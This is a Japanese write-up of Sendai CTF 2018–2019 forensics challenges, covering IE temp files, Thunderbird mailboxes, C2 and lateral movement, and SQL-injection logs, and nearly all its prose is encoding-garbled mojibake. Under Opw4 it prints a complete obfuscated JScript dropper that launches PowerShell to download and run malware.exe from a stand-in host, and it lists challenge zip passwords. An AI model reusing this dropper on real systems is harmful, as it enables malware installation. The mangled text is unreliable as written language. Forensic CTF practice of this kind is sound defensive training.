ã¨ããã¨ã§ãunzipãããã$MFTã¨prefetchã渡ãããã$MFTã§ãã¡ã¤ã«ãã¹ããSI_Created Onã確èªãéãããã ãprefetchã®Last Run Timeãå
¥åãããæ£è§£ã
Lab.2 èå¼±æ§æ»æã³ã¼ãã®ç¹å®
100
ææãã½ã³ã³ãã¿ã¤ã ã©ã¤ã³è§£æããã¨ãããã¦ã§ããµã¤ãé²è¦§ä¸ã«èå¼±æ§æ»æãåããçè·¡ãçºè¦ãã¾ããã
$MFTï¼Lab.1ã®æ·»ä»ãã¡ã¤ã«ï¼ã®ã¿ã¤ã ã©ã¤ã³è§£æããªãã³ã«Internet Explorerã®ä¸æãã¡ã¤ã«ï¼ãã®åé¡ã®æ·»ä»ãã¡ã¤ã«ï¼ã®è§£æã«ãããææã«å©ç¨ãããèå¼±æ§æ»æã³ã¼ãã®ãã¡ã¤ã«åãæ¨æ¸¬ãã¦ãã ããã
ãªããèå¼±æ§æ»æã³ã¼ãã®ãã¡ã¤ã«ã¯ãå
容ãããã¹ãã«æ¸ãæãã¦ãããããå±éºã¯ããã¾ããã
ï¼»ãã©ã°ï¼½
ææã«å©ç¨ãããèå¼±æ§æ»æã³ã¼ãã®ãã¡ã¤ã«åï¼åè§ï¼ ä¾ï¼abc.swf
ï¼»åé¡ãã¡ã¤ã«ï¼½
lab02.zip
ï¼»åé¡ãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
214EAE71B3D80F37AD6674FC3B37D193
ã¨ãããã¨ã§ãããä¸æ©ç®ãåãããªããMFTãè¦ãã°ããã®ã ãããï¼(CTFã®ãã©ã¬ã³ã¸ãã¯ã«ããããã©ã¦ã¶ãã©ã¬ã³ã¸ãã¯ã¾ã¨ã)ãåèã«ãããã¾ãã(ãã«ã¦ã§ã¢ææ対å¿åºç¤ç·¨)ä»å°ããã®è³æãåèã«ããã®ã¯ã¨ã¦ããããTemporary Internet Files/Content.IE5ã¯ä¸æãã©ã«ãã§ããããã ãããã«èªã¿è¾¼ãã ãã¡ã¤ã«ãã¡ã¢ãªã«ç§»ãããããã ããã®ä¸ãæ¢ãã¦ããããã¾ã ã«ããã¨ãã£ãæ¢ãæ¹ãåãã£ã¦ããªããããã§è³æãè¦ã¦ããã¨.swfãã¡ã¤ã«ãå±éºãããªããã ã
ââ# grep swf -rl .
./index.dat
./ZJH275HV/sdk[1].js
ã¨2ã¤ã®ãã¡ã¤ã«ã§swfã¨ããæ¡å¼µåã«è¨åãã¦ããããã®ä¸ã§ãç¨ãããã¦ãããã¡ã¤ã«åãå
¥åãã¦ããã¨index.datã§è¨åãã¦ãã.swfããããã®ããã ã
(ä»å°CTF2018 Lab.2 èå¼±æ§æ»æã³ã¼ãã®ç¹å® 100)ãã£ã¨ã¹ãã¼ããªè§£ãæ¹ãããããã ããã©ã¬ã³ã¸ãã¯ãã¼ã«ã¯ã¾ã ã¾ã ç¥ããªããã®ãå¤ãããã ã
$MFTãç¨ããã¿ã¤ã ã©ã¤ã³è§£æã¯ä»å°ããã®ããããã®æ¹ãç°¡åããã次ã®æ©ä¼ã«ãã£ã¦ã¿ãã
Lab.3 é®æ対象URLã®ç¹å®
100
èå¼±æ§æ»æã³ã¼ãã®ãã¦ã³ãã¼ãå
URLãç¹å®ãããããã·ãµã¼ãã§éä¿¡ãé®æãããã¨ã¨ãã¾ããã
Internet Explorerã®ä¸æãã¡ã¤ã«ï¼Lab.2ã®æ·»ä»ãã¡ã¤ã«ï¼ã解æããèå¼±æ§æ»æã³ã¼ãã®ãã¦ã³ãã¼ãå
URLãç¹å®ãã¦ãã ããã
ï¼»ãã©ã°ï¼½
èå¼±æ§æ»æã³ã¼ãã®ãã¦ã³ãã¼ãå
URLï¼åè§ãå°æåï¼
ä¾ï¼http://www.example.com/aaa.swf
å
ã®åé¡ã§æ½åºããæã«URLã¯åºã¦ããã®ã§ããããå
¥åããã°çµäºã
50
2018å¹´1æ4æ¥ï¼æ¥æ¬æéï¼ã«å
¬éãããããèå¼±æ§ã®è«æã§ã¯ã説æã®ããã«ä»¥ä¸ã®ã³ã¼ããç¨ãããã¦ãã¾ãã
1 ; rcx = kernel address
2 ; rbx = probe array
3 retry:
4 mov al, byte [rcx]
5 shl rax, 0xc
6 jz retry
7 mov rbx, qword [rbx + rax]
è«æå·çè
ããã®èå¼±æ§ã«ã¤ããå称ãçãã¦ãã ããã
ï¼»ãã©ã°ï¼½
èå¼±æ§ã®å称ï¼åè§ã¢ã«ãã¡ãããå°æåï¼
ä¾ï¼heartbleed
ãã®èå¼±æ§ã«ã¤ãã¦ã®å称㯠Meltdown ã§ãã(HIRT-PUB18001ï¼MeltdownãSpectre åé¡ã¨æ´¾çãã CPU èå¼±æ§åé¡)
Tri.2 ç¡æã§ä»®æ³é貨çºæ
50
ãã©ã¦ã¶ã§ä»®æ³é貨ãçºæããCoinhiveãªã©ã®ãã¼ã«ããã«ã¦ã§ã¢ãå©ç¨ããä»äººã®ã³ã³ãã¥ã¼ã¿ã®è½åãåæã«ä½¿ã£ã¦ä»®æ³é貨ã®ãã¤ãã³ã°ãè¡ãè¡çºã®å称ï¼é称ï¼ãçãã¦ãã ããã
ï¼»ãã©ã°ï¼½
ä¸è¨ã®ãããªè¡çºã®å称ï¼å
¨è§ã«ã¿ã«ãï¼
ä¾ï¼ã¯ãã¹ãµã¤ãã¹ã¯ãªããã£ã³ã°(æå·è³ç£ã®ãã¤ãã³ã°ã¨ã¯ï¼ããã®ç¹å¾´ã¨å人ã§ã®åå ã«ã¤ãã¦è§£èª¬)
Tri.3 è»æ¤
åã®ä»äºäºº
50
ãã½ã³ã³ãã¹ããã«æ®ãããä¸é½åãªãã¸ã¿ã«è¨é²ãä¾é ¼ã«ããæ¹æ¶ããä»äºå±ãé¡æã¨ããæ¥æ¬ã®å°èª¬ã§ã2018å¹´7æãããã©ãæ¾éããããä½åã®ã¿ã¤ãã«ãçãã¦ãã ããã
ï¼»ãã©ã°ï¼½
ä½åã®ã¿ã¤ãã«ï¼åè§ã¢ã«ãã¡ãããå°æåï¼
ä¾ï¼scarecrow
ããããç³»ã®åé¡ã¯AIã«èãã¦ãããéãã
ã²ã¨ã¾ã2018ãä¸åºåããpicoCTFãéå¬ä¸ãªã®ã§ãã¡ãã«åãå
¥ãã¦ããããã®æ¬¡ã«2019ã§ããã
2019
Opw1.ç¶æ³ç¢ºèª
100
ï¼»åé¡ã®èæ¯ï¼½
ã¤ã³ã·ãã³ãçºçæ¥æï¼ 2019å¹´11æ04æ¥ï¼æï¼
ã»æ¬æ¥23:42é ãããªããé¢å¸ä¸ã«ãå¶æ¥æã®ç¤¾å¡ã¹ãºããããããä¸å¯©ã¡ã¼ã«ãå±ããã¨ã®é»è©±é£çµ¡ãã£ãããã§ããå¿
è¦ãªèª¿æ»ã»å¯¾å¿ãå®æ½ãã¦ãã ããã
ï¼»è£è¶³ï¼½
ããªã¼ãã³ã¯ã¼ã«ããã«é
ç½®ããããµã¼ããªã©ã®ã¢ã¤ãã ãã¯ãªãã¯ããã¨ãã¢ã¤ãã ã«æ ¼ç´ããã¦ãããã°ãã¡ã¤ã«ããã¦ã³ãã¼ããããã社å¡ã®è¨¼è¨ãªã©ã®ã¡ãã»ã¼ã¸ã確èªããããããã¨ãã§ãã¾ãã
åé¡åçã«å¿
è¦ã¨æããã¡ã¤ã«ãªã©ãããªã¼ãã³ã¯ã¼ã«ããããåå¾ã解æãã¦ãã ããã
ãªã¼ãã³ã¯ã¼ã«ãURL: http://www.sectanlab.jp/sendaictf2019/opw/
ãID: sendaictf2019
ãPass: soulfriend
ï¼»äºåé
å¸ãã¼ã¿ï¼½
ãã®ã¸ã£ã³ã«ã§ã¯ã以ä¸äºåé
å¸ãã¼ã¿ãå©ç¨ãã¾ãããã¦ã³ãã¼ãã®ããå±éãã¦ããã¦ãã ããã
sendaictf2019day2.zip
â»ZIPã«æ ¼ç´ããã¦ããåãã¡ã¤ã«ã®ãã¹ã¯ã¼ãã¯ãã·ããªãªã®é²è¡ã«åããã¦ãªã¼ãã³ã¯ã¼ã«ãã§é示ããã¾ãã
ï¼»åé¡ï¼½
ã»ã¹ãºãããã«é»è©±é£çµ¡ãç¶æ³ã確èªãã¦ãã ããã
ãªã¼ãã³ã¯ã¼ã«ãã®ã¹ãºããããã¯ãªãã¯ããã¨ã証è¨ã確èªã§ãã¾ãã
ï¼»ãã©ã°ï¼½
ã¹ãºãããã®è¨¼è¨ã®ã ãã§å²ã¾ããæååï¼åè§ãå°æåï¼
ä¾ï¼ [email protected]
ãªã¼ãã³ã¯ã¼ã«ãã¨ããæãã§ç¤¾å
ã¨ç¤¾å¤ã®æ§æå³ã渡ããããããããã¤ã³ã·ãã³ããèªã¿è§£ãããã ãé¢ç½ã試ã¿ã ã¨æããã¾ãã¯å¶æ¥æã«ãããé´æ¨ããã«èãã¦ã¿ãã証è¨ã«éä¿¡å
ã¡ã¼ã«ã¢ãã¬ã¹ãè¨è¼ããã¦ããã®ã§ããããå
¥åãçµäºã
Opw2.ä¸å¯©ã¡ã¼ã«åä¿¡è
100
ï¼»åé¡ï¼½
ã»ã¹ãºããããåä¿¡ããä¸å¯©ã¡ã¼ã«ã¯ãä»ã®ç¤¾å¡ã«ãéä¿¡ããã¦ããããã§ããã¹ãºããã以å¤ã§ä¸å¯©ã¡ã¼ã«ãåä¿¡ããã¦ã¼ã¶ã¼åãç¹å®ãã¦ãã ããã
ï¼»ãã©ã°ï¼½
ã¹ãºããã以å¤ã§ä¸å¯©ã¡ã¼ã«ãåä¿¡ããã¦ã¼ã¶ã¼åï¼åè§ãå°æåï¼
ä¾ï¼ user01
ã¨ãããã¨ã§ã»ãã®äººãã¯ãªãã¯ãã¦ã¿ããããå¤åºä¸ã§èããªããPCã解æãããããªããããã¡ã¼ã«ã®è§£ææ¹æ³ãæ¢ãã¦ããªãã®ã§ææ¢ãã§ãã£ã¦ã¿ãã
ã¾ãã¯é´æ¨ããã®PCã§æªããã¡ã¼ã«ã®çè·¡ãæ¢ãã¦ã¿ãã
æ¢ãå ´æãåãããªãããOUTLOOKãã¸ãã«ããã¨èããããã®ããã«ããã®PCã®OSã«ã¤ãã¦èª¿ã¹ãã
(Windowsã®ãã¼ã¸ã§ã³æ
å ±ã©ãããã)ãåèã«ãããè¦ã¤ãããWindows 7 enterpriseã ããã ãSANSã®è³æãè¦ãªããæ¢ãããOUTLOOKãã©ã«ãã¯è¦å½ãããªãããªã¼ãã³ã¯ã¼ã«ãã確èªããã¨ã¡ã¼ã«ã½ããã¯Thunderbirdã ã¨æ¸ãã¦ããããã®æ
å ±ããã¨ã«æ¢ãã
MFT(ãã¡ã¤ã«ãã¹ãã詳ããç¥ã)ã¨LogFile(å®è¡ãããã°ããããã¡ã¤ã«ãã¹ãç¥ã)ãä¸ãããããã©ã«ããèããªããé²ãã§ããããPC05\Users\user05\AppData\Roaming\Thunderbird\Profiles\oob69yqk.default-release\Mail\mail.sendaict\Inbox
ã®ä¸ã«æ»æè
ã®ã¡ã¼ã«ã¢ãã¬ã¹ã確èªã§ããã調ã¹ã¦ã¿ãã¨ãã®inboxãåä¿¡ãã¬ã¤ã®ããã ãåä¿¡ãã¬ã¤ã®å称ãç¥ã£ã¦ããã°ãã£ã¨æ©ãã§ãããããããªãã
ã§ã¯ãã»ãã®äººã®ãè¦ã¦ããã
PC13/Users/user13/AppData/Roaming/Thunderbird/Profiles/heudsa4v.default-release/Mail/mail.sendaictf.invalid]
ââ# strings Inbox | grep attacker
Return-Path: <[email protected]>
(SquirrelMail authenticated user attacker)
From: [email protected]
ããã¾ãããuser19ã«ã¯thunderbirdã®ãã©ã«ããªãããã£ã¦ãçµäºã
Opw3.ä¸å¯©æ·»ä»ãã¡ã¤ã«
100
ï¼»åé¡ï¼½
ã»ã¹ãºããããåä¿¡ããä¸å¯©ã¡ã¼ã«ã®æ·»ä»ãã¡ã¤ã«ï¼ZIPå½¢å¼ï¼ã«æ ¼ç´ããã¦ãããã¡ã¤ã«åã確èªãã¦ãã ããã
ï¼»ãã©ã°ï¼½
ä¸å¯©æ·»ä»ãã¡ã¤ã«ï¼ZIPå½¢å¼ï¼ã«æ ¼ç´ããã¦ãããã¡ã¤ã«å
ä¾ï¼ ï¼æåã®è¦ç©æ¸.js
ã¨ãããã¨ã§ãæ·»ä»ãã¡ã¤ã«ã®zipã®ä¸èº«ãè¦ãã¨ããåé¡ã
=?ISO-2022-JP?B?GyRCQEE1YT1xGyhC?=.zip
ã¨ããzipãã¡ã¤ã«ã¨ãããã¨ã¯å
ã®åé¡ã®å ´æã§ç¢ºèªã§ãããä¸èº«ã®ãã¡ã¤ã«ãã©ã®ããã«ç¢ºèªãããããã®ã ãããï¼é´æ¨ããã¯é¿ãã¦ããªããã©user13ã¯éãã¦ãã¾ã£ãã®ãããããªãã=?ISO-2022-JP?B?GyRCQEE1YT1xGyhC?=.zip
user13ã«å±ãã¦ããã®ãé´æ¨ããã¨åãã§ãããã¨ãããã¨ã§user13ã«ç¦ç¹ãå½ã¦ãã
zipãã¡ã¤ã«ã«é¢ããä½ãããã®ã¢ã¯ã·ã§ã³ãããã¨èããæ¤ç´¢ãããã¨ãã®ããã«ãè«æ±æ¸.zipã«å¤æãã¦ä½ããããã¦ãããã°ããã£ãããããæªããã¨èããã
ãã®zipã®ä¸ã§file creationãã¦ãããã®ãé¸æããã°çµäºã
Opw4.ä¸å¯©URL
100
ï¼»åé¡ï¼½
ã»ä¸å¯©ã¡ã¼ã«ã®æ·»ä»ãã¡ã¤ã«ã¯ãã¦ã³ãã¼ãã§ãããéå°ããã¨ä¸å¯©URLãããã«ã¦ã§ã¢ããã¦ã³ãã¼ããå®è¡ããããã§ãã ãã¦ã³ãã¼ããã¢ã¯ã»ã¹ããä¸å¯©URLãç¹å®ãã¦ãã ããã
ï¼»ãã©ã°ï¼½
ãã¦ã³ãã¼ããã¢ã¯ã»ã¹ããä¸å¯©URLï¼åè§ãå°æåï¼
ä¾ï¼ http://abc.example.com/a.exe
ã¨ããããã§ãéä¿¡å
URLãè¦ã¤ããã
è«æ±æ¸.jsã®å¾åããpowershellãèµ·åãã¦ããããããããµã¤ãã訪ããå±¥æ´ãåããã°ããã¨æããã
ãããããã¡ã¤ã«ãæ¢ãã¦ãéä¿¡å
ã¨ãªããã®ãè¦ã¤ããããªãã®ã§ã.zipãunzipãã¦ãã¡ã¤ã«ã解æãããã¨ã«ããã
ââ# strings ������.js
var AbCdEfg = WScript.CreateObject("W4wt93qS4wt93qc4wt93qr4wt93qi4wt93qp4wt93qt4wt93q".replace(/4wt93q/g, "") + ".Sh" + "ell");
var paranum = 0;
codestr = "powershell.exe $cHPNC8 = 'XmqRLtY';$a = 'Msxml' + '2.XML' + 'HTTP';$D9Bkpiq = 'zwfnxFQn';$b = 'ADO' + 'DB.' + 'Stream';$ViXHtaa = 'afPaNR';$c = 'G' + 'E' + 'T';$y6Zs8i = 'y9Nhj';$d = 1 - 1 + 1;$arfRq = 'Zret8';$hr = New-Object -ComObject $a;$Xb9C3z = 'WipMlqo1';$ab = New-Object -ComObject $b;$OWNniyp3 = 'okFmlbcF';$path = $env:temp + '\a.exe';$MeDUZLzU = 'ViEEyiDt';$hr.open($c, 'h'+'Tt'+'p:' +'/' + '/'+ 'sl'+ 'i' + 'me.'+ 'ex' + 'amp' +'le.c' + 'om/'+'m'+'al' + 'wa'+ 're.e'+'xe', 0);$BkmnIhm = 'lMglhJCD';$hr.send();$OlUroA = 'ovwJO';$Zb3f7RVj2 = 'AyWGheD';$EUKnRQ = 'eq9G6';$jMjfuyL = 't9tGnMuT';$ab.open();$PaLGhJEr = 'Cf9lVfd';$ab.type = $d;$qiEHJ = 'NjQsbW3';$ab.write($hr.responseBody);$Gwtjxiu1 = 'Zm4B6l';$ab.savetofile($path);$LwzToi = 'XIEOnwD';$ab.close();$LSbathIv = 'yzxeScO';$JHAFYpTN = 'W1tBds';$LawOS = 'YTYyJd';$GVNSY2VL3 = 'QEXcEk';$aj8q2Pl = 'BFrEKTl';$B3Xz2p = 'YWgPSR2Y';$yGEJla7O = 'lWqvE';Start-Process $path;";
AbCdEfg.Run(codestr, paranum);
é£èªåããã¦ãã模æ§ãçãä¸ãããã§hr.openãã¦ãã¨ãããã¢ã¯ã»ã¹ãã¦ããã¨èãããããé£èªåã解ãããçµäºãå®éã®ãã«ã¦ã§ã¢ã ã¨unzipãããèµ·åãããããããªãï¼å®å
¨ã«åãåºãæ¹æ³ã¯ããã®ã ãããï¼
Opw5.ææPC
100
ï¼»åé¡ï¼½
ã»ä¸å¯©ã¡ã¼ã«ã®æ·»ä»ãã¡ã¤ã«ãéå°ããPCï¼ãã«ã¦ã§ã¢ã«ææããPCï¼ã®IPã¢ãã¬ã¹ãç¹å®ãã¦ãã ããã
ï¼»ãã©ã°ï¼½
ä¸å¯©ã¡ã¼ã«ã®æ·»ä»ãã¡ã¤ã«ãéå°ããPCã®IPã¢ãã¬ã¹ï¼åè§ï¼
ä¾ï¼172.16.0.10
ã¨ãããã¨ã§ãIPã¢ãã¬ã¹ã調ã¹ããã¯ã¡ã¹(user13)ã®ã¢ãã¬ã¹ã調ã¹ãã¨ãããã¨ã ãããï¼ã¨ã¢ã¼ãã£ãã¡ã¯ãã調ã¹ã¦ãããããããªããè³æã«ç®ãéãã¨æ¸ãã¦ãã£ããçµäºã
Opw6.C2ãµã¼ã
100
ï¼»åé¡ï¼½
ã»ææããPCã¯ãC2ãµã¼ãã«æ¥ç¶ããæ»æè
ã«é éæä½ãããããã§ããC2ãµã¼ãã®ãã¹ãåãç¹å®ãã¦ãã ããã
ï¼»è£è¶³ï¼½ ã»ãªã¼ãã³ã¯ã¼ã«ãã§ææãããã«ã¦ã§ã¢ã¯å±éºãªãããäºåé
å¸ãã¼ã¿ããåé¤ãã¦ããã¾ãã
ã»æ¬åé¡ã®åçã«ãããããã«ã¦ã§ã¢æ¤ä½ã解æãããå ´åã¯ã次ã®ã¨ããç¡å®³åãã¦ããåé¡ç¨ãã«ã¦ã§ã¢ã解æãã¦ãã ããã
ãæ¬ç©ã®ãã«ã¦ã§ã¢ï¼ C2ãµã¼ãã®ãã¹ãåæ«å°¾ãã.comã
ãåé¡ç¨ãã«ã¦ã§ã¢ï¼ C2ãµã¼ãã®ãã¹ãåæ«å°¾ãã.invalidã
åé¡ç¨ãã«ã¦ã§ã¢ã解æããå ´åã¯ãåçã«ãããã.invalidããã.comãã«ç½®ãæãã¦ãã ããã
ããªããåé¡ç¨ãã«ã¦ã§ã¢ã¯ã»ãã¥ãªãã£å¯¾çã½ããã§æ¤ç¥ããã¾ãã®ã§ãä»®æ³ãã·ã³ãªã©ãå©ç¨ã解æãã¦ãã ããã
ï¼»ãã©ã°ï¼½
C2ãµã¼ãã®ãã¹ãåï¼åè§ï¼
ä¾ï¼ abc.example.com
ï¼»åé¡ãã¡ã¤ã«åï¼½
malware_safe.zip â»ãã«ã¦ã§ã¢æ¤ä½ã解æãããå ´åã®ã¿å©ç¨ãã¾ãã
ãï¼ãã®ä»ã¢ããã¼ãã§ãæ£è§£ã«è¾¿ãçãã¾ããï¼
ï¼»ZIPãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
12D09625F2051FAEED4F95A985CD5C2A
éä¿¡ãã¦ããã¨èãã¦éä¿¡ãã°ãªã©ãããã¨èãããããããè¦ã¤ãããã¨ãã§ããªãã£ããã©ããã¿ãã°ããã£ãã®ã ãããï¼ã足ãåºãªããwriteupãè¦ã¦ã¿ãã(ä»å°CTF 2019 Opw6.C2ãµã¼ã 100)ãã¨ãªãã¨éä¿¡ãã°ãè¦ãã¨ããçºæ³ã¯ããã£ãã¨æãããã©ãã«ããããèããããªãã£ãããããã·ãéã«ããã¨ãããã¨ãç¥ã£ã¦ãããã
##Opw7.ã©ãã©ã«ã ã¼ãã¡ã³ã
100
ï¼»åé¡ï¼½
ã»ä¸å¯©ã¡ã¼ã«ã«ããææããPCããããããã¯ã¼ã¯çµç±ã§ä»ã®PCã«ææãæ¡å¤§ãããã¡ããé éæä½ãããããã§ãããããã¯ã¼ã¯çµç±ã§ææããPCã®IPã¢ãã¬ã¹ãç¹å®ãã¦ãã ããã
ï¼»ãã©ã°ï¼½
ãããã¯ã¼ã¯çµç±ã§ææããPCã®IPã¢ãã¬ã¹ï¼åè§ï¼
ä¾ï¼ 172.16.0.11
ã¯ã¡ã¹ãããã横å±éãã¦ããã¨èãããä»åº¦ã¯éã«ä½ããªãã®ã§ãã©ãããéä¿¡ãã°ãè¦ããããã®ã ãããï¼ãã¶ããã«ã¯ãããã ã¨æããã©ããã®è¨¼æ ãã¤ããããã§ãããã¯ãã©ãã«ã¢ã¼ãã£ãã¡ã¯ããããã®ãããããªãã
ãã¡ãã¯æ¨ªå±éã®çè·¡ãæ¢ãã¨ãããããã§ã«æ¨ªå±éãããã®ã¯äºå®ã¨ãã¦ãã£ã¦ãé éæä½ã®éä¿¡ãè¦ããã®ã§ã¯ãªãã®ãï¼å
ã¨åããã°ãè¦ãã¨ä¸å¯©ãªãã¹ãã¨éä¿¡ãã¦ããã®ãããä¸ã¤ããããããçãã
Opw8.æ»æãã¼ã«
100
ï¼»åé¡ï¼½
ã»æ»æè
ã¯ãä¸å¯©ã¡ã¼ã«ã«ããææããPCãããä»ã®PCã«æææ¡å¤§ãããããããããã¯ã¼ã¯çµç±ã§ä»ã®PCä¸ã®ããã°ã©ã ãèµ·åã§ãããã¼ã«ãå©ç¨ããããã§ãã
ã»ãã®ãã¼ã«ãèµ·åãããæ¥æãç¹å®ãã¦ãã ãããï¼èª¤å·®1å以å
ãæ£è§£ã¨ãã¾ããï¼
ï¼»ãã©ã°ï¼½
ãã¼ã«ãèµ·åãããæ¥æï¼yyyy/mm/dd-hh:mmãåè§ï¼
ä¾ï¼ 2019/11/16-11:12
å®è¡ãããã¨ããããã¢ã¼ãã£ãã¡ã¯ããæ¢ãã¦ããããä»åprefetchããªãã®ã§ããã¾ã§è©³ããæ¢ãããªãã(ä»å°CTF 2019 Opw8.æ»æãã¼ã« 100)writeupãè¦ããçæ³çã§ã¯ãªããã©ãç¾å®ã§ãå®è¡ãããæå»ããã®ããã«çµã£ã¦ãããã¨ã¯èãããããæè»ã«èãã¦ããããã
Opw9.ã·ã¼ã¯ã¬ãã
300
ï¼»åé¡ï¼½
ã·ã¼ã¯ã¬ããåé¡ã§ãã
åé¡ã®èª¬ææããã³åé¡ZIPãã¡ã¤ã«ã®ãã¹ã¯ã¼ãã¯ãªã¼ãã³ã¯ã¼ã«ãã«é ããã¦ãã¾ãã
ï¼»åé¡ãã¡ã¤ã«åï¼½
Secret.zip
USBãè¦ããã®ã§æ¼ãã¦ã¿ããçºè¦ãã¡ã¢ãªã¤ã¡ã¼ã¸ã渡ãããã
ââ# file ddimage
ddimage: DOS/MBR boot sector, code offset 0x3c+2, OEM-ID "MSDOS5.0", sectors/cluster 8, reserved sectors 8, root entries 512, sectors 20480 (volumes <=32 MB), Media descriptor 0xf8, sectors/FAT 8, sectors/track 63, heads 4, hidden sectors 1, serial number 0xe8992337, unlabeled, FAT (12 bit)
autopsyã§è§£æãã¦ã¿ããä½ãããã®png,docx,xlsxãããããã ããã¡ã¤ã«ã·ã¹ãã ãè¦ã¦ããããã¨åããããªãã®ãä½ãããçè·¡ãæ¢ãåé¡ããªï¼(ä»å°CTF 2019 Opw9.ã·ã¼ã¯ã¬ãã 300)writeupè¦ãããããªã¨ããã«ãæ
å ±ãé ãã¦ããã¨ã¯ç¥ããªãã£ããwordãexcelãzipãªã®ã¯ç¥ã£ã¦ãããããããã®åããç¥ããªãã£ãã
OpwN.ã·ã¼ã¯ã¬ãããã®2(æªè§£æ±º)
300
ï¼»åé¡ï¼½
ã·ã¼ã¯ã¬ããåé¡ï¼ã§ãã
åé¡ã®ãã©ã°ã¯ãªã¼ãã³ã¯ã¼ã«ãã«é ããã¦ãã¾ãã
ã§ããªãã
Tri1.ä¸æ£ãã°ã¤ã³å¯¾ç
100
ï¼»åé¡ï¼½
ã»ã¦ã§ããµã¤ããã½ããã¦ã§ã¢ãªã©ã«ãã°ã¤ã³ããéã«ãIDã¨ãã¹ã¯ã¼ããçã«ããèªè¨¼ã®å¾ãå¿
è¦ã«å¿ãã¦ãã1åèªè¨¼ãæ±ããèªè¨¼æ¹å¼ãââèªè¨¼ã¨ããã
ï¼»ãã©ã°ï¼½
èªè¨¼æ¹å¼ã®å称ï¼å
¨è§ãæ¥æ¬èªï¼
ä¾ï¼ãã¹ã¯ã¼ãèªè¨¼
ããã¯äºæ®µéèªè¨¼ã§ããã
100
ï¼»åé¡ï¼½
ã»æã»ãã¥ãªãã£ç 究è
ã2019å¹´3æã«ããã°ã§çºè¡¨ããæ
å ±ã«ããã¨ãå°æ¹¾ã®æã¡ã¼ã«ã¼è£½ãã½ã³ã³ã«ããªã¤ã³ã¹ãã¼ã«ãããèªåæ´æ°ãã¼ã«ã«ãããã¯ãã¢ãä»è¾¼ã¾ããã¨ããæ¨çåæ»æãå¤æããã¨ã®ãã¨ã§ãã
ã»åã»ãã¥ãªãã£ç 究è
ã¯ããã®æ»æãOperation ãââãã¨åä»ãã¾ããã
ï¼»ãã©ã°ï¼½
æ¬æ¨çåæ»æã«ä»ããããå称ï¼åè§ãè±èªï¼
ä¾ï¼ Aurora
Aiããã«èãã¦çµäºããã®æ¨çåæ»æã¯ã©ããã£ã¦é²ãããã ï¼ããã·ã¥å¤ã確èªããã¨ãï¼
Tri3.Botnet Brute forces RDP
100
ï¼»åé¡ï¼½
ã»æã»ãã¥ãªãã£ç 究è
ã2019å¹´6æã«ããã°ã§çºè¡¨ããæ
å ±ã«ããã¨ãRDPæ¥ç¶ãå¯è½ãªç«¯æ«ã«å¯¾ãããã«ã¼ããã©ã¼ã¹æ»æã§ææãåºããããããããã確èªãããã¨ã®ãã¨ã§ããã¾ããåããããããã¯ãã§ã«ä¾µå®³æ¸ã¿ã¨è¦ããã150ä¸ä»¶ã®ãã¹ãã¨ã¢ã«ã¦ã³ãæ
å ±ã®ãªã¹ããä¿æãã¦ããã¨ã®ãã¨ã§ãã
ã»åã»ãã¥ãªãã£ç 究è
ã¯ããã®ããããããããââãã¨åä»ãã¾ããã
ï¼»ãã©ã°ï¼½
æ¬ããããããã«ä»ããããå称ï¼åè§ãè±èªï¼
ä¾ï¼ Necurs
ãã¡ããåæ§ã«AIã«èãã¦çµäºã
NL1.IDSãã±ãã解æ
100
ï¼»åé¡ã®èæ¯ï¼½
ã»DMZã«è¨ç½®ãã¦ããIDSã®ç£è¦ãå¤é¨ã«å§è¨ãã¦ãã¾ããå§è¨å
ããå
¬éWebãµã¼ãã«å¯¾ããSQLã¤ã³ã¸ã§ã¯ã·ã§ã³æ»æãæ¤ç¥ããã¨ã®é£çµ¡ãããã¾ããã
ã»å
¬éWebãµã¼ãã«ã¯ããã¼ã¿ãã¼ã¹ãããã¼ã¿ãåå¾ãã¦åçã«ãã¼ã¿ãæ´æ°ãã¦è¡¨ç¤ºããæ©è½ãããã¾ãã
ã»ããªãã¯ããã®æ»æã®å½±é¿ã確èªããããã調æ»ãå®æ½ãããã¨ã«ãã¾ããã
ï¼»åé¡ï¼½
ã»IDSãæ»ææ¤ç¥æã«èªåä½æããPCAPãã¡ã¤ã«ãåæããæ»æå
ã®IPã¢ãã¬ã¹ãç¹å®ãã¦ãã ããã
ï¼»ãã©ã°ï¼½
æ»æå
ã®IPã¢ãã¬ã¹ï¼åè§ï¼
ä¾ï¼192.168.15.10
ï¼»åé¡ãã¡ã¤ã«åï¼½
NL01.zip
ï¼»ZIPãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
923DDE988283338B4063812B7B484BEB
ä¸è¨ã®ãããªpcapã渡ããããhttpãããã³ã«ã§ä¸å¯©ãªGETãéã£ã¦ããã¦ã¼ã¶ã¼ããããhttpã§æ¤ç´¢ãããä¸ç®ã§ãããã
NL2.æ»æã³ã¼ã
100
ï¼»åé¡ï¼½
ã»ãã¹ã¯ã¼ãã®ããã·ã¥å¤ã®åå¾ãæåããSQLã¤ã³ã¸ã§ã¯ã·ã§ã³ã®æ»æã³ã¼ããç¹å®ãã¦ãã ããã
ã»æ»æè
ã¯ãã¦ã§ããã¼ã¸ã®ãã©ã¼ã ã«æ»æã³ã¼ããæå
¥ãã¦ãã¾ãã
ï¼»ãã©ã°ï¼½
SQLã¤ã³ã¸ã§ã¯ã·ã§ã³ã®æ»æã³ã¼ãï¼åè§ï¼
ä¾ï¼' OR 1=1--
ï¼»åé¡ãã¡ã¤ã«åï¼½
NL02.zip
ï¼»ZIPãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
38A1D1CCC0230E9C192B857D763D8046
ã¨ãããã¨ã§ãä½ãããã®logãã¡ã¤ã«ã渡ãããããã¹ã¯ã¼ãã®ããã·ã¥å¤ãã¨ãããããã ã
DBã¸ã®ã¯ã¨ãªãè¦ã¦ã¿ãã¨ãããããæ»æãããã¤ãããã
ââ# strings DB�T�\[�o\[mysql\]���Omysql.log | grep Query | grep SELECT
3 Query SELECT itemnum, sdesc, ldesc, price FROM itemdb WHERE isnew = 'Y'
5 Query SELECT itemnum, sdesc, ldesc, price FROM itemdb WHERE isnew = 'Y'
6 Query SELECT price FROM itemdb WHERE itemnum = '1000'
7 Query SELECT itemnum, sdesc, ldesc, price FROM itemdb WHERE itemnum IN (1000)
8 Query SELECT itemnum, sdesc, ldesc, price FROM itemdb WHERE itemnum IN (1000)
15 Query SELECT itemnum, sdesc, ldesc, price FROM itemdb WHERE isnew = 'Y'
16 Query SELECT orderdate, ordercost, orderitems, itemlist, ccard FROM orderdb WHERE accountid = '' ORDER BY orderdate,ordertime
